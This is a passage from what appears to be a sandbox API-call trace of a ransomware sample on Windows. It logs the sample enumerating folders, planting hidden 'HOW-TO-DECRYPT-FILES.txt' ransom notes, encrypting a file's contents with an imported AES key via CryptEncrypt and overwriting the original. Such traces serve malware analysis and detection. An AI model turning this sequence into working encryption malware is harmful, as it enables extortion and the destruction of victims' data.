out: lpFindFileData=0x364560) returned 0 [0048.146] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.146] SetErrorMode (uMode=0x0) returned 0x1 [0048.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), fInfoLevelId=0x0, lpFileInformation=0x1c56f50 | out: lpFileInformation=0x1c56f50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eb20410, ftCreationTime.dwHighDateTime=0x1d2da20, ftLastAccessTime.dwLowDateTime=0x7eb20410, ftLastAccessTime.dwHighDateTime=0x1d2da20, ftLastWriteTime.dwLowDateTime=0xd7101e80, ftLastWriteTime.dwHighDateTime=0x1d2f5a0, nFileSizeHigh=0x0, nFileSizeLow=0x27e)) returned 1 [0048.147] GetLastError () returned 0x12 [0048.147] SetErrorMode (uMode=0x0) returned 0x1 [0048.147] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.156] GetLastError () returned 0x0 [0048.156] GetFileType (hFile=0x184) returned 0x1 [0048.156] SetErrorMode (uMode=0x0) returned 0x1 [0048.156] GetFileType (hFile=0x184) returned 0x1 [0048.156] WriteFile (in: hFile=0x184, lpBuffer=0x1c72c20*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1c72c20*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.157] GetLastError () returned 0x0 [0048.157] CloseHandle (hObject=0x184) returned 1 [0048.157] GetLastError () returned 0x0 [0048.157] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.157] GetLastError () returned 0x0 [0048.157] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c74954 | out: lpFileInformation=0x1c74954*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eafa2b0, ftCreationTime.dwHighDateTime=0x1d2da20, ftLastAccessTime.dwLowDateTime=0x7eafa2b0, ftLastAccessTime.dwHighDateTime=0x1d2da20, ftLastWriteTime.dwLowDateTime=0x6bffa390, ftLastWriteTime.dwHighDateTime=0x1d2da20, nFileSizeHigh=0x0, nFileSizeLow=0x71080)) returned 1 [0048.157] GetLastError () returned 0x0 [0048.157] SetErrorMode (uMode=0x0) returned 0x1 [0048.158] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.158] GetLastError () returned 0x5 [0048.159] SetErrorMode (uMode=0x0) returned 0x1 [0048.159] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.159] GetLastError () returned 0x5 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.159] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.159] SetErrorMode (uMode=0x0) returned 0x1 [0048.159] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.159] GetLastError () returned 0x12 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.159] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.160] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.160] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.160] SetErrorMode (uMode=0x0) returned 0x1 [0048.160] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), fInfoLevelId=0x0, lpFileInformation=0x1c94238 | out: lpFileInformation=0x1c94238*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5364020, ftCreationTime.dwHighDateTime=0x1d2f5a0, ftLastAccessTime.dwLowDateTime=0xe5364020, ftLastAccessTime.dwHighDateTime=0x1d2f5a0, ftLastWriteTime.dwLowDateTime=0xfe644ba0, ftLastWriteTime.dwHighDateTime=0x1d2f5a0, nFileSizeHigh=0x0, nFileSizeLow=0x2fa)) returned 1 [0048.160] GetLastError () returned 0x12 [0048.160] SetErrorMode (uMode=0x0) returned 0x1 [0048.161] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.162] GetLastError () returned 0x0 [0048.162] GetFileType (hFile=0x184) returned 0x1 [0048.162] SetErrorMode (uMode=0x0) returned 0x1 [0048.162] GetFileType (hFile=0x184) returned 0x1 [0048.162] WriteFile (in: hFile=0x184, lpBuffer=0x1caff08*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1caff08*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.163] GetLastError () returned 0x0 [0048.163] CloseHandle (hObject=0x184) returned 1 [0048.164] GetLastError () returned 0x0 [0048.164] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.164] GetLastError () returned 0x0 [0048.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), fInfoLevelId=0x0, lpFileInformation=0x1cb1c3c | out: lpFileInformation=0x1cb1c3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe5364020, ftCreationTime.dwHighDateTime=0x1d2f5a0, ftLastAccessTime.dwLowDateTime=0xe5364020, ftLastAccessTime.dwHighDateTime=0x1d2f5a0, ftLastWriteTime.dwLowDateTime=0xde44a9a0, ftLastWriteTime.dwHighDateTime=0x1d2f5a0, nFileSizeHigh=0x0, nFileSizeLow=0xbee30)) returned 1 [0048.164] GetLastError () returned 0x0 [0048.164] SetErrorMode (uMode=0x0) returned 0x1 [0048.164] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.165] GetLastError () returned 0x5 [0048.165] SetErrorMode (uMode=0x0) returned 0x1 [0048.165] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.166] GetLastError () returned 0x5 [0048.166] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.166] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.166] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.166] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.166] SetErrorMode (uMode=0x0) returned 0x1 [0048.166] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.166] GetLastError () returned 0x12 [0048.166] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.166] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.167] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.167] SetErrorMode (uMode=0x0) returned 0x1 [0048.167] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.167] GetLastError () returned 0x12 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.167] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.167] SetErrorMode (uMode=0x0) returned 0x1 [0048.167] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.167] GetLastError () returned 0x12 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.167] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.167] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.167] SetErrorMode (uMode=0x0) returned 0x1 [0048.167] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.168] GetLastError () returned 0x12 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.168] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.168] SetErrorMode (uMode=0x0) returned 0x1 [0048.168] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.168] GetLastError () returned 0x12 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.168] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.168] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.168] SetErrorMode (uMode=0x0) returned 0x1 [0048.168] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd50f0 | out: lpFileInformation=0x1cd50f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8639f00, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe8639f00, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe8639f00, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520)) returned 1 [0048.168] GetLastError () returned 0x12 [0048.168] SetErrorMode (uMode=0x0) returned 0x1 [0048.169] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.193] GetLastError () returned 0x0 [0048.193] GetFileType (hFile=0x184) returned 0x1 [0048.193] SetErrorMode (uMode=0x0) returned 0x1 [0048.193] GetFileType (hFile=0x184) returned 0x1 [0048.193] WriteFile (in: hFile=0x184, lpBuffer=0x1cf1078*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1cf1078*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0048.194] GetLastError () returned 0x0 [0048.194] CloseHandle (hObject=0x184) returned 1 [0048.194] GetLastError () returned 0x0 [0048.194] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.194] GetLastError () returned 0x0 [0048.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cf2e5c | out: lpFileInformation=0x1cf2e5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d01800, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe4d01800, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe4d01800, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0x23000)) returned 1 [0048.195] GetLastError () returned 0x0 [0048.195] SetErrorMode (uMode=0x0) returned 0x1 [0048.195] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.195] GetLastError () returned 0x5 [0048.196] SetErrorMode (uMode=0x0) returned 0x1 [0048.196] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.196] GetLastError () returned 0x5 [0048.197] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.197] GetLastError () returned 0x5 [0048.197] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.197] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.197] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.197] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.197] SetErrorMode (uMode=0x0) returned 0x1 [0048.197] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.197] GetLastError () returned 0x12 [0048.197] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.197] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.197] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.197] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.197] SetErrorMode (uMode=0x0) returned 0x1 [0048.198] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.212] GetLastError () returned 0x12 [0048.212] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.212] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.212] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.212] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.212] SetErrorMode (uMode=0x0) returned 0x1 [0048.213] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.213] GetLastError () returned 0x12 [0048.213] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.213] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.213] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.213] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.213] SetErrorMode (uMode=0x0) returned 0x1 [0048.213] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.214] GetLastError () returned 0x12 [0048.214] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.214] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.214] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.214] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.214] SetErrorMode (uMode=0x0) returned 0x1 [0048.214] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.214] GetLastError () returned 0x12 [0048.214] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.214] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.214] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.214] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.214] SetErrorMode (uMode=0x0) returned 0x1 [0048.214] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), fInfoLevelId=0x0, lpFileInformation=0x1d15320 | out: lpFileInformation=0x1d15320*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70634730, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x70634730, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x70634730, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x77)) returned 1 [0048.214] GetLastError () returned 0x12 [0048.214] SetErrorMode (uMode=0x0) returned 0x1 [0048.215] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.215] GetLastError () returned 0x0 [0048.215] GetFileType (hFile=0x184) returned 0x1 [0048.215] SetErrorMode (uMode=0x0) returned 0x1 [0048.215] GetFileType (hFile=0x184) returned 0x1 [0048.215] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x77 [0048.215] GetLastError () returned 0x0 [0048.215] ReadFile (in: hFile=0x184, lpBuffer=0x1d17268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1d17268*, lpNumberOfBytesRead=0x18ecac*=0x77, lpOverlapped=0x0) returned 1 [0048.216] GetLastError () returned 0x0 [0048.216] CloseHandle (hObject=0x184) returned 1 [0048.216] GetLastError () returned 0x0 [0048.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70634730, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x70634730, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x70634730, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x77)) returned 1 [0048.216] GetLastError () returned 0x0 [0048.216] SetErrorMode (uMode=0x0) returned 0x1 [0048.216] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c708) returned 1 [0048.216] GetLastError () returned 0x0 [0048.251] CryptImportKey (in: hProv=0x37c708, pbData=0x1b6fb1c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ee0) returned 1 [0048.251] GetLastError () returned 0x0 [0048.251] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.251] GetLastError () returned 0x0 [0048.256] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360b60) returned 1 [0048.256] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1b9cb68*=0x1, dwFlags=0x0) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1b9cb34, dwFlags=0x0) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9cbb0*, pdwDataLen=0x18ec9c*=0x170, dwBufLen=0x170 | out: pbData=0x1b9cbb0*, pdwDataLen=0x18ec9c*=0x170) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9cebc*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1b9cebc*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b9ceec*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1b9ceec*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0048.256] GetLastError () returned 0x0 [0048.256] CryptDestroyKey (hKey=0x360ee0) returned 1 [0048.256] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.256] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.256] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", lpFilePart=0x0) returned 0x36 [0048.256] GetLastError () returned 0x0 [0048.256] SetErrorMode (uMode=0x1) returned 0x0 [0048.256] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.257] GetLastError () returned 0xb7 [0048.257] GetFileType 